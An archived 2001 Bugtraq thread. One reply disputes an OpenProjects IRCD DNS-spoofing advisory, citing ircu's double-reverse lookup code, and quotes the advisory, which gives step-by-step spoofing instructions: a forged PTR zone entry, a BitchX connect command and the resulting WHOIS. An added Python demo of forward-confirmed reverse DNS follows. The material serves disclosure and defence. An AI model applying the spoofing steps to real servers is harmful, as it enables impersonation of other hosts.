Bugtraq mailing list archives

Re: OpenProjects IRCD allows DNS spoofing


From: "Matthew S. Hallacy" <poptix@techmonkeys.org>
Date: Sun, 14 Oct 2001 07:28:17 -0600

This is incorrect: ircu has had hostname checking for a very
long time, as has hybrid. While it's completely possible
that the nameserver used by this server had its cache poisoned, or
that a different bug was found, I can assure you that it is not
as simple as setting a PTR entry and connecting.

Snippet from s_bsd.c in ircu2.10.05:

  /*
   * Verify that the host to ip mapping is correct both ways and that
   * the ip#(s) for the socket is listed for the host.
   */
  if (hp)
  {
    for (i = 0; hp->h_addr_list[i]; i++)
      if (!memcmp(hp->h_addr_list[i], &cptr->ip, sizeof(struct in_addr)))
        break;
    if (!hp->h_addr_list[i])
    {
      sendto_op_mask(SNO_IPMISMATCH, "IP# Mismatch: %s != %s[%08x]",
          inetntoa(cptr->ip), hp->h_name, *((unsigned int *)hp->h_addr));
      hp = NULL;
    }
  }   


Perhaps the person showing this to you was nice enough to poison a
nameserver for you as well.

Further testing:


/MODE poptrix +s 65535
*** 32767  : Server notice mask (0x7fff)
[test.net]  IP Mismatch 192.168.100.1 != babble.tc.umn.edu[89975ea0]
[test.net]  Client Connecting: poptix [~poptix@192.168.100.1) ]
/WHOIS poptix
-------------------------------------------------
| poptix (~poptix@192.168.100.1) (unknown)
| ircname  : poptix
| server   : test.net (ircu test server)
: idle     : 0 hours 4 mins 21 secs (signon: Sun Oct 14 08:22:31 2001)
/VERSION
*** u2.10.05.18.(ipcheck4-5).: test.net M>0B6CeEHIKMStU

[irc@tranq ircd]$ host 192.168.100.1
1.100.168.192.in-addr.arpa. domain name pointer babble.tc.umn.edu.
[irc@tranq ircd]$ host babble.tc.umn.edu
babble.tc.umn.edu. has address 160.94.151.137


                        Matthew S. Hallacy

* OpenProjects.NET IRCD DNS Spoofing *

OpenProjects.net's ircd has some truly braindead code re DNS lookups
and doesn't do a proper double-reverse paranoid lookup. In fact, it
is possible to spoof any hostname that actually exists on the internet.

Here is how to exploit it.

1. Choose a Hostname to Spoof.
It is important to keep in mind that you must choose a hostname that
actually exists. For our example, we will use 'gary7.nsa.gov'.

2. Point Your Reverse Lookup To The Hostname.
For our example, we will put the following in our BIND zonefile:
      47.222.42.209.in-addr.arpa.     IN      PTR     gary7.nsa.gov.

Where we will assume you are using the same IP I used, 209.42.222.47.

3. Connect To A Vulnerable IRC Server.
BitchX -H 209.42.222.47 jmutex asimov.openprojects.net

Try a WHOIS on yourself.

/whois jmutex
| jmutex (jmutex@gary7.nsa.gov) (Government)
| ircname  : Jukka Mutex
| server   : asimov.openprojects.net (Fremont, CA)
: idle     : 0 hours 0 mins 24 secs (signon: Tue Oct  9 05:32:16 2001)

Credits: jmutex@newgold.net, chrisj@newgold.net, lilo
Found by: Joseph Mallett
Affects: OpenProjects u2.10.05.18.(ipcheck4-5)
Rumored to Affect: Hybrid

Copyright (c) 2001 Joseph Mallett. All rights reserved.
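The check the two posts disagree about, written out as an added example (this is not ircu, Hybrid or OpenProjects code). A PTR-only lookup trusts whatever the owner of the reverse zone puts in it, which is the attack in the advisory; the "double-reverse" check resolves the PTR name forward again and accepts it only if the connecting IP is among its A records, which is what the ircu snippet above does before it discards hp. The resolver data is constructed for the demo: the 192.168.100.1 / babble.tc.umn.edu pair mirrors the mismatch shown in the test session, shell.example.net and 203.0.113.5 are invented. The LiveResolver class is an assumption about how one would wire this to the system resolver and is not exercised here.

```python
"""Forward-confirmed reverse DNS ("double-reverse" lookup) versus PTR-only.

Added example, not ircu/Hybrid/OpenProjects code.  All records below are
constructed for the demo; see the comments on each entry.
"""
import socket
from typing import Dict, List, Optional, Tuple

# Constructed reverse (PTR) records: what the *client's* IP resolves to.
# The reverse zone for an IP block is controlled by whoever owns the block,
# so an attacker can put any name at all here.
PTR_RECORDS: Dict[str, str] = {
    "192.168.100.1": "babble.tc.umn.edu",  # spoofed PTR, as in the thread
    "192.0.2.10": "shell.example.net",     # constructed legitimate host
    # 203.0.113.5 deliberately has no PTR at all
}

# Constructed forward (A) records: what the *named host's* owner publishes.
A_RECORDS: Dict[str, List[str]] = {
    "babble.tc.umn.edu": ["160.94.151.137"],           # address quoted in thread
    "shell.example.net": ["192.0.2.10", "192.0.2.11"],  # constructed, multi-homed
}


class FakeResolver:
    """Offline resolver backed by the constructed records above."""

    def ptr(self, ip: str) -> Optional[str]:
        return PTR_RECORDS.get(ip)

    def a(self, name: str) -> List[str]:
        return A_RECORDS.get(name, [])


class LiveResolver:
    """Same interface on top of the system resolver (assumption: not used
    by the demo, shown only so the check can be tried against real DNS)."""

    def ptr(self, ip: str) -> Optional[str]:
        try:
            return socket.gethostbyaddr(ip)[0]
        except (socket.herror, socket.gaierror):
            return None

    def a(self, name: str) -> List[str]:
        try:
            return socket.gethostbyname_ex(name)[2]
        except (socket.herror, socket.gaierror):
            return []


def naive_hostname(ip: str, resolver) -> str:
    """PTR-only: display whatever name the reverse zone owner chose."""
    return resolver.ptr(ip) or ip


def confirmed_hostname(ip: str, resolver) -> Tuple[str, Optional[str]]:
    """Double-reverse: accept the PTR name only if the forward lookup of that
    name lists the connecting IP.  Returns (host_to_display, operator_notice);
    on mismatch the bare IP is used, like ircu setting hp = NULL."""
    name = resolver.ptr(ip)
    if name is None:
        return ip, None                     # no PTR: nothing to verify, use IP
    addrs = resolver.a(name)
    if ip in addrs:                         # the loop over h_addr_list in s_bsd.c
        return name, None
    first = addrs[0] if addrs else "no A record"
    # Dotted form instead of ircu's %08x, otherwise the same notice.
    return ip, f"IP# Mismatch: {ip} != {name}[{first}]"


def demo() -> Dict[str, Tuple[str, Tuple[str, Optional[str]]]]:
    """Run both checks over the three constructed clients."""
    r = FakeResolver()
    return {ip: (naive_hostname(ip, r), confirmed_hostname(ip, r))
            for ip in ("192.168.100.1", "192.0.2.10", "203.0.113.5")}


if __name__ == "__main__":
    for ip, (naive, (host, notice)) in demo().items():
        line = f"{ip:15}  PTR-only: {naive:20}  confirmed: {host}"
        print(line + (f"   ({notice})" if notice else ""))
```

The spoofed client is the interesting row: the PTR-only path would label 192.168.100.1 as babble.tc.umn.edu, while the confirmed path falls back to the IP and raises the mismatch notice. The caveat both posts touch on still applies: this check only proves that the forward and reverse zones agree, so if the server's recursive nameserver has had its cache poisoned for the forward name, the confirmation succeeds and nothing in the ircd can tell the difference.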
